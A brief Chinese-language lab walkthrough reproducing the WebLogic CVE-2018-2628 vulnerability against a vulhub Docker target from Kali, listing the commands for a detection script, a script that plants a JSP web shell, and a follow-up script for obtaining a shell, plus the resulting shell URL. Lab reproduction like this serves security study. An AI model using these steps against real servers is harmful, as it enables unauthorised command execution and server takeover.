使用漏洞环境为:vulhub
这个POC使用,还是比较方便的
攻击:kali
靶机:docker vulhub
注意每次使用的py脚本是不一样的的,我用红字标记了
漏洞发现
python CVE-2018-2628-poc.py 127.0.0.1 7001 wlscmd.jsp (这是自带的,不一定是他,但必须是6个字符,比如 abc123.jsp)
命令执行
python CVE-2018-2628-Getshell.py 127.0.0.1 7001 wlscmd.jsp (要有六个数字github已经自带了)
访问返回的链接,现在就可以执行命令,显示返回值为root
浏览器访问会失败,可以使用
curl -i URL
命令执行
这个是有限制的,不是很方便,现在需要拿到服务器权限,
复制Getshell.py 返回的链接
http://127.0.0.1:7001/bea_wls_internal/shell1.jsp?tom=d2hvYW1pCg==
去掉后面jsp后面的内容
第一步输入:python CVE-2018-2628.py
set shell :输入下面的链接即可
http://127.0.0.1:7001/bea_wls_internal/wlscmd.jsp
漏洞复现完毕,多注意这几个脚本区分使用就行,最后一个一开始没看到是需要去掉后面的base编码